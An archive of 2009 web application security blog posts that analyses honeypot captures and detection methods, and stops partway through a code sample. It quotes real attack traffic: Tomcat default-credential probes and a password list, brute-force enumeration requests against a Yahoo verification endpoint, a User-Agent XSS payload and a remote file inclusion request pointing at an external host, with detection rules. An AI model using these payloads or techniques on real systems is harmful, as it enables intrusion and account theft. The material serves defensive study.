Tactical Web Application Security: 2009

Tuesday, October 6, 2009

Identifying Denial of Service Conditions Through Performance Monitoring

Submitted by Ryan Barnett 10/06/2009

Here is an interesting web application threat modeling exercise for you - how do you plan to identify and mitigate web application level denial of service conditions on your web sites?

This is one of those pesky security questions that seems pretty straightforward on the surface, but becomes much more challenging once you start peeling back the layers of complexity and interactions. Here are some items to keep in mind.

Network DoS vs. Web App DoS

Whereas network level DoS attacks aim to flood your pipe with lower-level OSI traffic (SYN packets, etc.), web application layer DoS attacks can often be achieved with much less traffic. Just take a look at RSnake's Slowloris app if you want to see a perfect example of the fragility of web server availability. The point here is that the amount of traffic needed to cause an HTTP DoS condition is often much less than what a network level device would identify as anomalous, so the device would not report it as it would a traditional network level botnet DDoS attack.

Rate Limiting

A common identification/mitigation implementation is to attempt Rate Limiting. This is essentially done by setting request threshold limits over a predefined period of time and monitoring request traffic for violations. While this is certainly useful for identifying aggressive automated attacks, it has its own limitations.
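As a rough illustration of the threshold-over-time idea, here is a minimal sliding-window sketch in Python. The class name, the limit of 3 requests per 60 seconds, and the sample client address are all assumptions made up for the example; they are not taken from any particular product.

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Flag clients that exceed `limit` requests within `window` seconds."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        # (client, resource) -> timestamps of recent requests
        self._hits = defaultdict(deque)

    def record(self, client, resource, now):
        """Record one request; return True if the threshold is now violated."""
        hits = self._hits[(client, resource)]
        hits.append(now)
        # Drop timestamps that have aged out of the window.
        while hits and hits[0] <= now - self.window:
            hits.popleft()
        return len(hits) > self.limit


# Hypothetical traffic: four quick requests, then one much later.
limiter = SlidingWindowLimiter(limit=3, window=60)
results = [limiter.record("203.0.113.7", "/login", t) for t in (0, 10, 20, 30, 100)]
print(results)
```

Keying the counters on both client and resource reflects the point that a threshold is specific to the resource it protects.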

What resources to protect?

While protecting a web application login page is straightforward, many web site owners have not properly identified which resources are both critical and susceptible to DoS conditions. There are many web apps that are extremely resource intensive and take a long time to complete - for example any reporting interface that needs to query a back-end database to generate large reports. These apps are perfect targets for a DoS attack as the overall number of requests needed to consume open HTTP sockets and RAM is much lower than for a static resource.

What threshold to set?

Rate limiting is not a "one-size fits all" approach. It is highly dependent upon the resource itself. The threshold you would set against a login page to identify a brute force attack is much different than what you might set in order to identify a data scraping or DoS attack. The challenge for the defender is knowing ahead of time what to set. This is not easy as most users are missing a significant piece of the puzzle - correlating web application performance statistics. You may set an inbound rate limiting threshold for a resource that is much too high, and the application could fail due to the load (false negative), or you might set it much too low and start firing off alerts when in fact the application is able to handle the load just fine (false positive).

Web Application Performance Monitoring

The best method for identifying fragile web resources and potential DoS thresholds is to actually monitor and track web application transaction processing times. Breach Security today announced that WebDefend 4.0 has a new Performance monitoring capability that aims to fill this important need.

With performance monitoring, the WAF user can track the average processing time including the combined average request time, web server processing time and response time. The following definitions apply in this pane:

• Request time is measured from the first packet to the last packet of the request.

• Web server processing time is measured from the last packet of the request to the first packet of the response.

• Response time is measured from the first packet to the last packet of the response.

With this information, it is easy to quickly identify the top URLs with high response latency and to pinpoint whether this is an application processing or networking issue. This data gives a much truer picture of DoS conditions than rate limiting thresholds alone. The main advantages that this data brings to DoS threat modeling are identifying fragile resources that would be susceptible to attack and estimating an appropriate threshold setting.
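The three timing definitions above can be sketched in a few lines of Python. This is only an illustration of the arithmetic, not how WebDefend implements it; the `Transaction` fields, the millisecond timestamps, and the sample URLs are assumptions invented for the example.

```python
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean


@dataclass
class Transaction:
    url: str
    req_first: int   # time of first request packet (ms)
    req_last: int    # time of last request packet (ms)
    resp_first: int  # time of first response packet (ms)
    resp_last: int   # time of last response packet (ms)

    @property
    def request_time(self):
        return self.req_last - self.req_first

    @property
    def server_time(self):
        return self.resp_first - self.req_last

    @property
    def response_time(self):
        return self.resp_last - self.resp_first


def slowest_urls(transactions, top=3):
    """Rank URLs by average web server processing time, slowest first."""
    by_url = defaultdict(list)
    for t in transactions:
        by_url[t.url].append(t.server_time)
    averages = {url: mean(times) for url, times in by_url.items()}
    return sorted(averages.items(), key=lambda item: item[1], reverse=True)[:top]


# Hypothetical capture: a slow reporting page and a fast static page.
sample = [
    Transaction("/report", 0, 100, 4100, 4600),
    Transaction("/report", 10000, 10100, 16100, 16500),
    Transaction("/index.html", 20000, 20100, 20200, 20300),
]
ranking = slowest_urls(sample)
print(ranking)
```

A URL that tops this ranking with only a handful of requests is a candidate for a much lower rate limiting threshold than a static resource.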

Monday, October 5, 2009

WASC Honeypots - Apache Tomcat Admin Interface Probes

Submitted by Ryan Barnett 10/05/2009

We have seen some probes similar to the following in our WASC Distributed Open Proxy Honeypots -

GET /manager/html HTTP/1.1
Referer: http://obscured:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: obscured:8080
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=

This appears to be a probe attempt to access the Apache Tomcat Admin interface. This is due to the combination of URI "/manager/html" and port 8080. It looks as though the client is submitting authentication data in the Authorization header. If you decode the base64 data, it shows the credentials as "admin:admin" which is the default username/password combination when Tomcat is installed.
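For readers who want to check the decoding themselves, here is a small Python sketch that unpacks a Basic Authorization header value. The function name is made up for the example; the header value is the one from the captured probe.

```python
import base64


def decode_basic_auth(header_value):
    """Return (username, password) from an HTTP Basic Authorization header value."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    decoded = base64.b64decode(encoded).decode("utf-8")
    # Only the first colon separates the username from the password.
    username, _, password = decoded.partition(":")
    return username, password


creds = decode_basic_auth("Basic YWRtaW46YWRtaW4=")
print(creds)  # ('admin', 'admin')
```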

WASC Honeypot participant Erwin Geirnaert has seen similar activity and provides more data here. The attackers are conducting brute force scans trying different passwords for the "manager" account -

manager:Test
manager:adminserver
manager:sqlserver
manager:2009
manager:159753
manager:1234qwerasdfzxcv
manager:1234qwerasdf
manager:1234qwer
manager:123qwe
manager:123qweasd

What do the attackers want to do once they gain access to the Tomcat server? Install backdoor/command WAR files so that they can execute code. Time to double check your default account passwords and implement those ACLs to only allow authorized clients to your Management interfaces...

Monday, September 14, 2009

Distributed Brute Force Attacks Against Yahoo

Submitted by Ryan Barnett 09/14/2009

As part of the WASC Distributed Open Proxy Honeypot Project (DOPHP), we have been able to track some pretty extensive distributed brute force attacks against Yahoo end-user email accounts. Valid email accounts and/or valid account credentials are a huge commodity for SPAMMERS. Identifying valid accounts is important as it allows them to send SPAM messages only to real accounts, and they can also sell lists of valid accounts to other SPAMMERS. Taking this a step further, if the SPAMMERS are able to enumerate valid credentials for an account (username and password) they can then hijack the account and use it for SPAMMING.

Normal Web Login

This methodology is not new and Yahoo is obviously aware of these attacks aimed at their Yahoo mail web login interface page. This login page looks like this -

When a client clicks submit, the request looks similar to the following -

POST /config/login? HTTP/1.1
Host: login.yahoo.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://login.yahoo.com/
Cookie: B=ffetg09557ar5&b=3&s=od; cna=zwISA2sCdzgBAS+RbUtyRRes; Y=%2e
Content-Type: application/x-www-form-urlencoded
Content-Length: 296

.tries=1&.src=&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=007ofj55asupi&.v=0&
.challenge=hKhk9.OX5y0EOqJ3c4yxAH_rSrx5&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmy.yahoo.com&.pd=_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=foo&passwd=bar&.save=Sign+In

Notice in the POST payload that the application is tracking how many "tries" have been attempted. This is useful for throttling automated attacks, and once a client goes over a limit, Yahoo then presents the user with an added CAPTCHA challenge -

Also notice that the login page is presenting the end user with a generic error message indicating that the credentials were not correct but it does not inform the user whether it was the login or password that was wrong. All of this type of anti-automation defense is good. The problem is - is Yahoo applying this type of defense consistently throughout their entire infrastructure? Are there any ways for the SPAMMERS to find a backdoor? Unfortunately, yes.

Web Services App

The WASC DOPHP has identified a large scale distributed brute force attack against what seems to be a web services authentication system aimed at ISP or partner web applications. The authentication application is named "/config/isp_verify_user". Google links for the "isp_verify_user" app are here. One thing you will notice in looking at these results is that there is an incredibly large number of Yahoo authentication subdomains that are hosting this application and are able to authenticate clients. If you click on one of the links, you will see that the response data returned in the browser is terse. It is simply 1 line of data such as this -

ERROR:210:Required fields missing (expected l,p)

The format of this data is obviously not intended for end users, but is more tailored for parsing by web service applications. It very well could be that many front-end web applications are validating the credentials submitted by clients against this isp_verify_user app. This particular error message is returned when a client does not submit the l (login) and p (password) parameters.

If a client sends a request for a login/username that does not exist, the app will return a message of -

ERROR:102:Invalid Login

Remember the generic error message presented on the normal login web page? Not here - it is easy for a SPAMMER to automate sending requests and cycling through various login names to identify if/when they hit on a valid Yahoo account name. When this happens, the application gives a different Invalid Password error message -

ERROR:101:Invalid Password

Note that this application does not implement any of the same CAPTCHA mechanisms that the standard login page does. This means that the attackers have an unimpeded avenue of testing login credentials. If the client sends the correct credentials, they will receive a message similar to the following (where username is the data submitted in the "l" parameter) -

OK:0:username

With this information, the SPAMMERS can then log into the enumerated email account and abuse it as they wish.

Scanning Methodology

Here is a small snippet of some of the transactions that were captured -

Get http://l33.login.scd.yahoo.com/config/isp_verify_user?l=kneeling@ort.rogers.com&p=qwerty HTTP/1.0
Get http://l06.member.kr3.yahoo.com/config/isp_verify_user?l=kneading@ort.rogers.com&p=000000 HTTP/1.0
Get http://69.147.112.199/config/isp_verify_user?l=kitbags@ort.rogers.com&p=333333 HTTP/1.0
Get http://217.12.8.235/config/isp_verify_user?l=kirk@ort.rogers.com&p=yankees HTTP/1.0
GET http://69.147.112.217/config/isp_verify_user?l=__miracle&p=weezer HTTP/1.0
GET http://69.147.112.202/config/isp_verify_user?l=123#@!.._69_&p=weezer HTTP/1.0
GET http://68.142.241.129/config/isp_verify_user?l=__lance_&p=weezer HTTP/1.0
GET http://202.86.7.115/config/isp_verify_user?l=__kitty__69__&p=weezer HTTP/1.0

The attackers used a three dimensional scanning methodology as described below -

Distributing the scanning traffic through multiple open proxy systems. This changes the source IP address as seen by the target web application so basic tracking/throttling is more challenging.
Distributing the traffic across different Yahoo subdomains. The advantage to this is that even if some form of failed authentication tracking is taking place, it is more difficult to synchronize this data across all systems.
Diagonal scanning - submitting different username/password combinations on each request. This is instead of vertical scanning, which is choosing 1 username and cycling through passwords, or horizontal scanning, which is choosing 1 common password and cycling through usernames.

*Diagonal, vertical, horizontal and three dimensional brute force scanning terminology is taken from a forthcoming book by Robert "RSnake" Hansen.
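To make the vertical/horizontal/diagonal distinction concrete, here is a rough Python sketch that labels a batch of failed login attempts. The function name and labels are assumptions for illustration only, and a real detector would also have to account for the other two dimensions (source proxies and target subdomains). The sample pairs come from the captured transactions above and from the Tomcat probes in the earlier post.

```python
def classify_scan(attempts):
    """Classify a list of (username, password) attempts by scanning pattern."""
    if len(attempts) < 2:
        return "insufficient data"
    users = {user for user, _ in attempts}
    passwords = {password for _, password in attempts}
    if len(users) == 1 and len(passwords) > 1:
        return "vertical"      # one username, many passwords
    if len(passwords) == 1 and len(users) > 1:
        return "horizontal"    # one password, many usernames
    if len(users) > 1 and len(passwords) > 1:
        return "diagonal"      # both change between requests
    return "repeat"            # the same pair sent repeatedly


diagonal = [
    ("kneeling@ort.rogers.com", "qwerty"),
    ("kneading@ort.rogers.com", "000000"),
    ("kitbags@ort.rogers.com", "333333"),
]
horizontal = [("__miracle", "weezer"), ("__lance_", "weezer"), ("__kitty__69__", "weezer")]
vertical = [("manager", "Test"), ("manager", "2009"), ("manager", "159753")]

print(classify_scan(diagonal), classify_scan(horizontal), classify_scan(vertical))
```

Note that the classification only works if the failed attempts are correlated in one place, which is exactly what distributing the traffic across proxies and subdomains is meant to prevent.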

Defensive Takeaways

Implement proper ACLs against all web services apps. In this case, the isp_verify_user app was clearly not intended for direct client usage, however there are no ACLs that prevent an end user from accessing it.
Identify any rogue web application authentication interfaces. This is a big problem for organizations that are either newly deploying distributed web services apps or those who have newly acquired a business partner.
Every web application must have some form of anti-automation capability in order to identify when clients are sending these requests.

Thursday, September 10, 2009

Identifying Anomalous Behavior

Submitted by Ryan Barnett 09/10/2009

A quick test for you - can you tell what is abnormal about this web application request transaction that was captured by the WASC Distributed Open Proxy Honeypots Project?

GET http://www.example.com/ HTTP/1.1
User-Agent: User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept-Language: zh-cn
Accept: */*
Host: www.example.com
Cookie: dedifa=3984320578.43783.3716814272.929907673, BIGipCookie=0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000, ASPSESSIONIDCSCBAQDQ=KMBPKNLCKCHMOMJAOPDPEPDF, pmaCookieVer=4, phpMyAdmin=98kdlkphdefb4lr6g5q9pke4if6gh0hg, pma_fontsize=82%25, session-id=00710064d8f2a4412ad4aeff56e96a2d, 802db0210e6b5f898c3d7fb3f82e11c0=-, _WealthCity_session=BAh7BzoPc2Vzc2lvbl9pZCIlN2NiMjM4MDM1Njk5ZDRlZTllMTY
4ZmZjYjE1NTVmNDU6EF9jc3JmX3Rva2VuIjE3YjVld0xiRkFvRy9zcnRJc1p1cDhsRldaZ
01TRTVqQ1l3RlhHUlNUNndVPQ%3D%3D--72c082556f241f5e62a26209b7c23cc42dbf
ae29, SQMSESSID=8dddae5eis8o9l2g6aul2o3ip4, JSESSIONID=678dcb81bdc1ce2e82346199c86d, SERVERID=A, CMSSESSID3aab33f1=96d98c3e54be906ecdf12195ada689a6, Compaq-HMMD=3BE1E1BD3B3B4AFED8970001A6AACE4862D267BC50C270927260D36E, _sm_au_d=1, SOrder=DatePr%2DDOWN%2D0%2D0%2D0%2D0, SRecInPage=30, ASPSESSIONIDCCRBACRC=DFEPKLMCAJDOEIPMMHNKMMCA, PHPSESSID=cf753ceefc14a51281818d11471552d4, _bz_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsY
XNo%0ASGFzaHsABjoKQHVzZWR7AA%3D%3D--1eb7a63eabc98dec0e0f418633d652fb97f5a8db, _session_id=8e87b0524f883f7c820ec6a136f7438b, SATSATSQID=goZXTx8HbQ5eBfjGevkYJ5-Lv-M8ChUHe-NfvvDycOHkc8CTM2SrJ4F_Y_IPU6Sc, ARPT=ZXJIWKS10.32.254.104CKMWW, SESSdab19e82e1f9a681ee73346d3e7a575e=fbc279a6c6c2e66cac0a6aba173bb261, vb_session=77e75d1912c7b6d796dae865fb95149a, BAIDUID=2A880F37E13E5EB37286E3EFF5BF43AA:FG=1
Proxy-Connection: Keep-Alive

Two anomalous items of interest in this request -

1) Bogus User-Agent payload
Specifically the string "User-Agent" actually appears at the beginning of the header payload. This looks like a botched script that tried to spoof the User-Agent data.

Defensive recommendation - look for this string in the User-Agent field and tag the request as an automated client that is spoofing request header data.

2) Number of diverse SessionIDs
The number of SessionID related cookies in this request is certainly larger than normal. Also note that there are SessionIDs for different web application technologies -

ASPSESSIONID - for ASP web apps
JSESSIONID - for Java web apps
PHPSESSID - for PHP web apps

What are the odds that this website is running all three of those web technologies? Pretty slim...

My take is that the scripted client is just populating bogus SessionID data for a bunch of different apps with the hopes that this would pass basic filters that force a SessionID name to exist but don't have knowledge of valid/active values. The most likely candidate is a SPAM bot that is looking to post data to blogs, forums, etc...

Defensive recommendations -

A. Count the number of SessionIDs/Cookies submitted. If it is too large, then alert as appropriate.

B. Look for SessionIDs/Cookie names that do not match your web application technology.
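The recommendations above (the User-Agent check plus checks A and B) can be sketched together in Python. This is a minimal illustration, assuming a site that runs only PHP and an arbitrary ceiling of 10 cookies; the function names, the pattern table, and both thresholds are invented for the example and would need tuning against real traffic.

```python
import re

# Assumed mapping of session cookie name patterns to technologies.
SESSION_COOKIE_PATTERNS = {
    "asp": re.compile(r"^ASPSESSIONID", re.IGNORECASE),
    "java": re.compile(r"^JSESSIONID$", re.IGNORECASE),
    "php": re.compile(r"^PHPSESSID$", re.IGNORECASE),
}


def parse_cookie_names(cookie_header):
    """Return cookie names, accepting ';' or ',' separators as seen in the capture."""
    names = []
    for pair in re.split(r"[;,]\s*", cookie_header):
        name = pair.split("=", 1)[0].strip()
        if name:
            names.append(name)
    return names


def find_anomalies(headers, expected_tech="php", max_cookies=10):
    """Return a list of anomaly descriptions for one request's headers."""
    findings = []
    if headers.get("User-Agent", "").lower().startswith("user-agent"):
        findings.append("User-Agent value starts with the header name")
    names = parse_cookie_names(headers.get("Cookie", ""))
    if len(names) > max_cookies:
        findings.append("too many cookies")
    for tech, pattern in SESSION_COOKIE_PATTERNS.items():
        if tech != expected_tech and any(pattern.match(n) for n in names):
            findings.append(f"unexpected {tech} session cookie")
    return findings


# Shortened version of the captured request headers.
headers = {
    "User-Agent": "User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; "
                  "rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
    "Cookie": "ASPSESSIONIDCSCBAQDQ=KMBPKNLCKCHMOMJAOPDPEPDF, "
              "JSESSIONID=678dcb81bdc1ce2e82346199c86d, "
              "PHPSESSID=cf753ceefc14a51281818d11471552d4",
}
findings = find_anomalies(headers)
print(findings)
```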

There are numerous other methods to identify anomalous web application activity. Security applications that are able to automatically generate web application learning and profiling (such as web application firewalls and web fraud systems) and correlate data from application users are able to identify deviations from the norm. These are complex systems that have advanced logic components to identify anomalous traffic such as that which is presented here.

Tuesday, August 18, 2009

WASC Distributed Open Proxy Honeypot Update - XSS in User-Agent Field

Submitted by Ryan Barnett 8/18/2009

In case you missed it, the WASC Distributed Open Proxy Honeypot Project launched Phase III at the end of July. We have a few sensors online and as we start gathering data, we are starting our analysis. Our goal is to be able to release "events of interest" to the community to try and raise awareness of web-based attacks.

As part of my day job working with web application firewalls, I often get asked about why certain signatures should be applied in certain locations. Why not just apply signatures to parameter payloads? This would certainly cut down on potential false positives and also increase performance. While it is true that the most likely attack vector locations are parameter payloads, these are not the only ones. Where else should you look for attacks?

Well, in looking at the honeypot logs today, I noticed an interesting XSS attack vector - injecting the XSS code into the request User-Agent string. Here is an example of the captured data -

GET http://www.example.com/image-2707303-10559226 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Referer: http://www.example.co.uk/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; <script>window.open('http://www.medchecker.com/side.htm','_search')</script>)
Host: www.example.com
Connection: Keep-Alive

Notice the window.open javascript code in the UA payload? The intent here seems to be to target any web-based log analysis tool. So, now that you know that the User-Agent data is a possible attack vector, the question is are you applying proper input validation/signature checking there? Are you logging this data to know if clients are attempting this attack?
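On the log analysis side, the usual defense is to escape header values before they are ever rendered as HTML. The following Python sketch shows both a crude detection check and the escaping step. The function names and the table-cell markup are assumptions for illustration; the script-tag regex is deliberately simplistic and is not a complete XSS signature.

```python
import html
import re

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def looks_like_xss(header_value):
    """Crude check for an opening script tag in a header value."""
    return bool(SCRIPT_TAG.search(header_value))


def render_log_cell(header_value):
    """Escape a logged header value before placing it in an HTML report."""
    return "<td>" + html.escape(header_value, quote=True) + "</td>"


# User-Agent value from the captured request.
ua = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; "
      "<script>window.open('http://www.medchecker.com/side.htm','_search')</script>)")

print(looks_like_xss(ua))
print(render_log_cell(ua))
```

Escaping at render time protects the log viewer even when the detection check misses an obfuscated payload.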

Monday, August 17, 2009

WASC WHID 2009 Bi-Annual Report - Social Media Sites Top Most Attacked Vertical Market

Submitted by Ryan Barnett 8/17/2009

Do you remember that line from the movie Field of Dreams: "If you build it, they will come"? Well, according to the data captured from the Web Application Security Consortium (WASC) Web Hacking Incidents Database (WHID) project, online criminals are reinforcing that movie quote. The fact is that profit driven criminals have learned that they can utilize social networking types of web sites (such as Twitter, Facebook and MySpace) as a means to target the huge number of end users.

Breach Security Labs, a WHID contributor, has just released a whitepaper report that analyzes the WHID events from the first half of 2009. In the report, it was found that Social Networking sites (such as Twitter) that utilize Web 2.0 types of dynamic, user-content driven data, are the #1 targeted vertical market. The reason for this is really two-fold:

1) Criminals are now directly targeting the web application end-users. The bad guys are using flaws within web applications to attempt to send malicious code to end users. Popular websites that have large user bases are now ripe targets for criminals. These are target rich environments.

2) Social networking sites are so popular partly because they allow their users to customize and update their accounts with user-driven content, widgets and add-ons. These features make the sites dynamic and fun for the end users, however they unfortunately also significantly increase the cross-site scripting (XSS) and cross-site request forgery (CSRF) attack surfaces.

The combination of these two points resulted in a number of different social media WHID 2009 Entries:

WHID 2009-2: Twitter accounts of the famous hacked
WHID 2009-4: Twitter Personal Info CSRF
WHID 2009-11: Lil Kim Facebook Hacked
WHID 2009-15: Kayne West has been Hacked
WHID 2009-23: Miley Cyrus Twitter Account Hit By Sex-Obsessed Hacker
WHID 2009-31: Double Clickjacking worm on Twitter
WHID 2009-32: 750 Twitter Accounts Hacked
WHID 2009-37: Twitter XSS/CSRF worm series

These examples clearly show that social networking sites that utilize Web 2.0 technology are the #1 attacked vertical market in WHID. This is important as social networking sites were grouped in the Other category in 2008. I would expect the trend of targeting large pools of end users to continue in the future as the bad guys work on methods of automating and scaling their attacks.

Monday, June 22, 2009

We've been blind to attacks on our Web sites

Submitted by Ryan Barnett 6/22/2009

There was an interesting article posted over on InfoWorld's website entitled We've been blind to attacks on our Web sites that drives home an important use-case for web application firewalls - visibility of web traffic. Too many people get so caught up in the "Block attacks with a WAF" mentality that they forget about the insight that can be gained by simply having full access to the inbound request and response data. From the article -

Of course, as the security manager, I can't afford a false sense of security, so I recently took some steps to find out just what was going on within our Web servers' network traffic. And it turns out that many attacks have been getting through our firewalls undetected. We'll never know how long this has been going on.

This is a typical first reaction. Most of today's network firewalls have some sort of Deep Packet Inspection capability, however most people don't use it due to the performance hit. Firewalls are mainly geared towards allowing or denying a connection based on the source and destination IP and port combinations instead of the actual application payloads. This is somewhat like when you use the telephone to call someone. A firewall would just check to see if you are allowed to call that phone number or not, but it doesn't usually look at what you are actually saying in the conversation once you are connected. The other big hindrance to inspecting web traffic at a network firewall is SSL. You have to be able to decrypt the layer 7 data in order to inspect it.

My company's front-end Web servers, which directly receive connections from the Internet through our firewalls, are definitely a hot spot in our network. The firewalls and IDS allow us to see some of what's going on, but can they really detect active content-based attacks? To find out, I installed a Web application firewall in my company's DMZ to tell us about active attacks that may not be identified by our other devices. I set the device up in monitor mode, though it can be set up to block attacks, because my goal was just to see what was going on. I wanted to know more about what's inside the connections to those Web servers.

This section shows that the WAF can initially be deployed in a "Detection Only" or monitoring mode to allow for visibility.

What I discovered is that our Web sites are being "scraped" by other companies -- our competitors! Some of the information on our sites is valuable intellectual property. It is provided online, in a restricted manner (passwords and such), to our customers. Such restrictions aren't very difficult to overcome for the Web crawlers that our competitors are using, because webmasters usually don't know much about security. They make a token attempt to put passwords and restrictions on sensitive files, but they often don't do a very good job.

Scraping attacks that are executed by legitimate users and aim to siphon off large amounts of data are a serious threat to many organizations. These types of attacks cannot be identified by signature based rules, as there is no overt malicious behavior to identify if only one individual transaction is inspected. Behavioral analysis needs to be employed to correlate multiple transactions over a specified time period to see if an excessive rate is being used. Anti-automation defenses here are critical.
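One way to picture this kind of behavioral correlation is to count how many distinct resources each authenticated user pulls within a time window. The Python sketch below is only an illustration of the idea; the function name, the 60 second window, the limit of 20 resources, and the sample users are all assumptions invented for the example.

```python
from collections import defaultdict


def find_scrapers(requests, window, max_resources):
    """Return users who fetched more than max_resources distinct URLs in any window.

    requests: iterable of (timestamp, user, url) tuples sorted by timestamp.
    """
    by_user = defaultdict(list)
    for ts, user, url in requests:
        by_user[user].append((ts, url))

    flagged = set()
    for user, events in by_user.items():
        start = 0
        for end in range(len(events)):
            # Advance the window start until it spans at most `window` seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {url for _, url in events[start:end + 1]}
            if len(distinct) > max_resources:
                flagged.add(user)
                break
    return flagged


# Hypothetical log: a crawler pulling one document per second, and a normal user.
log = [(i, "crawler", f"/docs/{i}") for i in range(50)]
log += [(0, "alice", "/docs/1"), (1800, "alice", "/docs/2"), (3600, "alice", "/docs/3")]
log.sort()

print(find_scrapers(log, window=60, max_resources=20))
```

Each individual request in this log looks perfectly legitimate; only the correlation across transactions exposes the crawler.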

Our Web application firewall found some other problems as well. We experience hundreds of SQL injection attack attempts every day. So far, none has been successful, but I'm amazed at the sheer volume. I can't imagine anyone having the time to sit around trying SQL injection attacks against random Web servers, so I have to assume that these attacks are coming from automated scripts. In any case, they are textbook examples of SQL injection, each one walking through various combinations of SQL code embedded in HTML. It looks like we've done a good job of securing our Web applications against these attacks, but it's always a little disconcerting to hear invaders pounding on the door.

As this section of the article shows, having visibility into the types of automated attacks being launched against a web application provides two key pieces of data -

Understanding of the Threat component of the Risk equation - there are many academic types of debates and discussions that happen early on in the development of software. One of the more challenging aspects to quantify is the threat. Is there really anyone out there targeting our sites? Where are they coming from? What attacks are they launching? Without this type of confirmed data obtained from the production network, it is difficult to accurately do threat modeling.
Validation of secure coding practices - it will become evident very quickly whether or not the web application is vulnerable to these types of injection attacks. If the application does not implement proper input validation mechanisms, then there is a possibility that the injected code will be executed and the application will respond abnormally. By inspecting both the inbound request and the outbound response, it is possible to confirm if/when/where input validation is faltering.

Monday, June 15, 2009

Challenges to webappsec - lightweight development

Submitted by Ryan Barnett 6/15/2009

Lightweight development of web applications (using WYSIWYG editors such as Shockwave/Flash) has created an interesting hiring trend that I believe has negatively impacted web application security. Because these web development tools are so easy to use, they do not need to be run by an actual programmer. This has resulted in a major shift towards web content being created by Graphic Designers instead of actual web application developers. Here is an actual job posting that I just ran across that confirms this trend:

About the Job
Web Graphic Designer / Flash Designer
Direct Response company is seeking a full-time, talented web designer who can hit the ground running, working with in-house designers to help design and develop concepts and web campaigns for various products. This is NOT a programming and/or developer position, we are looking for graphic designers who are experienced in web design.

This may not pose any significant security issues if you are only displaying a dynamic intro page to your site, however these types of applications are doing more and more these days. There have been numerous security vulnerabilities identified within Flash applications such as XSS, and there have even been some assessment tools released such as SWFScan to help find issues.

The big problem that I see is that it is hard enough to try and develop secure web application code when you have a true developer who is trained in secure coding principles. You don't have a fighting chance of having secure code if you now ask someone who is not a developer and is using a lightweight development tool like Flash. To make matters worse, if you are in this scenario and then you do happen to run vulnerability assessments against the resulting code, what are you going to do to fix the issue??? Good luck having your Graphic Designer fix the CSRF bug you found in their splash page.

Wednesday, June 10, 2009

Generic Remote File Inclusion Attack Detection

Submitted by Ryan Barnett 6/10/2009

A big challenge for identifying web application attacks is to detect malicious activity that cannot easily be spotted using signatures. Remote file inclusion (RFI) is a popular technique used to attack web applications (especially PHP applications) from a remote server. RFI attacks are extremely dangerous as they allow a client to force a vulnerable application to run their own malicious code by including a reference pointer to code from a URL located on a remote server. When an application executes the malicious code it may lead to a backdoor exploit or technical information retrieval.

The application vulnerability leading to RFI is a result of insufficient validation on user input. In order to perform proper validation of input to avoid RFI attacks, an application should check that user input doesn’t contain invalid characters or reference to an unauthorized external location. Or Katz, who is the WebDefend signature team lead at Breach Security recently gave a presentation at the OWASP Local Chapter meeting in Israel and Breach Security Labs has since released a whitepaper based on his research. I would like to highlight a few of the detection items that were presented.

Challenges to Generic Detection

When trying to use a negative security approach to build a generic solution for RFI attacks, a natural first step is to use a regular expression such as “(ht|f)tps?://” to search for a signature within parameter payloads. This initially seems like a good approach as it would identify the beginning portion of a fully qualified URI. While this is true, this approach will unfortunately result in many false positives due to the following:

There are request parameters which are used as external links (e.g. - they accept http:// as valid input) that point either back to the local host (WordPress and other apps do this) or legitimately point to a resource on a remote site.
There are "free text" request parameters that are prone to false positives. In many cases these parameters contain user input (free text submitted by the user to the application), and in other cases they contain large amounts of data that may include URL links, which can be falsely detected as an RFI attack.

URL Contains an IP Address

Most legitimate URL referencing is done by specifying an actual domain/hostname, and as such using an IP address as an external link may indicate an attack. A typical attack using an IP address looks like:

GET /?include=http://192.0.55.2/hacker.txt HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Therefore a rule for detecting such a condition should search for the pattern “(ht|f)tps?:\/\/” followed by an IP address. An example ModSecurity rule to detect it is:

SecRule ARGS "@rx (ht|f)tps?:\/\/([\d\.]+)" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'Remote File Inclusion'"
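To experiment with this pattern outside of ModSecurity, the same regular expression can be exercised in Python. This is only an approximation: `normalize` stands in for the t:urlDecodeUni, t:htmlEntityDecode and t:lowercase transformations using standard library calls, and does not claim to reproduce ModSecurity's decoding exactly. The function names are made up for the example.

```python
import html
import re
from urllib.parse import unquote

# Same pattern as the rule; the escaped slashes are not needed in Python.
IP_URL = re.compile(r"(ht|f)tps?://([\d.]+)")


def normalize(value):
    """Rough stand-in for t:urlDecodeUni, t:htmlEntityDecode, t:lowercase."""
    return html.unescape(unquote(value)).lower()


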